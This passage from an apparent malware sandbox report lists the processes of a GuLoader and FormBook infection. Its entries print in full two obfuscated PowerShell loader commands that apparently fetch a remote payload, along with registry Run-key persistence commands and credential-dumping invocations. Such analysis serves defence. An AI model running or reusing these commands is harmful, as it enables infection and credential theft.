                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2206071533.0000000008740000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2199790164.0000000005B55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2206269200.000000000C162000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:08:01:17
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:08:01:36
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:11
                                                            Start time:08:01:47
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:08:01:47
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:08:01:47
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
                                                            Imagebase:0x9c0000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:08:01:56
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"
                                                            Imagebase:0xc10000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:08:01:56
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:08:01:56
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:08:01:57
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:08:01:57
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:08:01:58
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres ' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse (Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. 
oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS RtAfrC iNenTagUd( B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;"
                                                            Imagebase:0xa20000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000014.00000002.3003059273.00000000059E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:08:01:58
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:08:01:59
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:23
                                                            Start time:08:02:06
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres ' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse (Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. 
oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS RtAfrC iNenTagUd( B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;"
                                                            Imagebase:0xa20000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000017.00000002.2668039251.0000000005634000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000017.00000002.2701170946.00000000085A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000002.2702490356.000000000A283000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:08:02:06
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:26
                                                            Start time:08:02:26
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0xcb0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.2858446917.00000000229A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001A.00000002.2815364367.0000000004843000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.2858446917.00000000233A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:true

                                                            Target ID:27
                                                            Start time:08:02:31
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:28
                                                            Start time:08:02:31
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:29
                                                            Start time:08:02:31
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
                                                            Imagebase:0x9c0000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:30
                                                            Start time:08:02:46
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe"
                                                            Imagebase:0x210000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.4222881972.0000000003590000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            Target ID:31
                                                            Start time:08:02:48
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\srdelayed.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\SysWOW64\srdelayed.exe"
                                                            Imagebase:0x530000
                                                            File size:16'384 bytes
                                                            MD5 hash:B5F31FDCE1BE4171124B9749F9D2C600
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:32
                                                            Start time:08:02:48
                                                            Start date:28/08/2024
                                                            Path:C:\Windows\SysWOW64\relog.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\relog.exe"
                                                            Imagebase:0xbf0000
                                                            File size:45'568 bytes
                                                            MD5 hash:DA20D543A130003B427AEB18AE2FE094
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            Target ID:33
                                                            Start time:08:03:01
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe"
                                                            Imagebase:0x210000
